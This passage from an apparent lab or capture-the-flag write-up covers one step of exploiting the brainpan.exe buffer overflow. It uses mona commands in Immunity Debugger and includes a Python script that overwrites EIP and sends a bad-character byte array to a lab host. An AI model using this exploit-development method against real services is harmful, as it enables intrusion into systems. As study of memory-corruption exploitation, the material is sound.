When crafting a shellcode, it's crucial to identify which characters may cause issues, referred to as bad characters
, and which are safe to use. To streamline the process of finding these bad characters for our exploit, we will leverage mona within Immunity Debugger
. First, we configure mona
's working directory in Immunity Debugger
using the following command:
!mona config -set workingfolder c:\mona
This sets the working directory for mona
in Immunity Debugger
. With the working directory configured, we can generate a bad character byte array using mona
with the following command:
!mona bytearray -cpb "\x00
The generated bad character byte array can be found in the mona
working directory, stored in a file named bytearray.txt
.
We then send this bad character array to our brainpan.exe
TCP server after overwriting the EIP
. For this purpose, I've created another script called brainpan_badchars.py. This script incorporates the mona bad characters array
into the payload.
#!/usr/bin/python3
import sys
import socket
from time import sleep
badchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = b"A" * 510 + b"B" * 4 + badchars
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.10.4', 9999))
payload = b'shitstorm /.:/' + buffer
sock.send(payload)
sock.close()
except:
print("Error connecting to the server")
sys.exit()
After executing the script and inspecting the ESP
(Extended Stack Pointer) dump in Immunity Debugger
(to dump the ESP, right-click on the ESP and from the drop-down menu, select Follow in Dump. It will dump and display all hex characters that we send with our python script), we can clearly observe all the bad characters sent by the Python program in Immunity Debugger
:
we retrieved the contents of ESP
, which was the memory address 005FF910
. To check for any undesirable characters specific to our exploit, we utilized mona
with the following command within Immunity Debugger
:
!mona compare -f c:\mona\bytearray.bin -a 005FF910
Mona
performed a comparison between the generated byte array and the ESP
dump.
In the context of brainpan.exe
, no bad characters were detected for our shellcode.
Now that we have identified the bad characters
to avoid in our exploit, our next step is to find the suitable module for our payload.
Next, we'll proceed to Finding the right module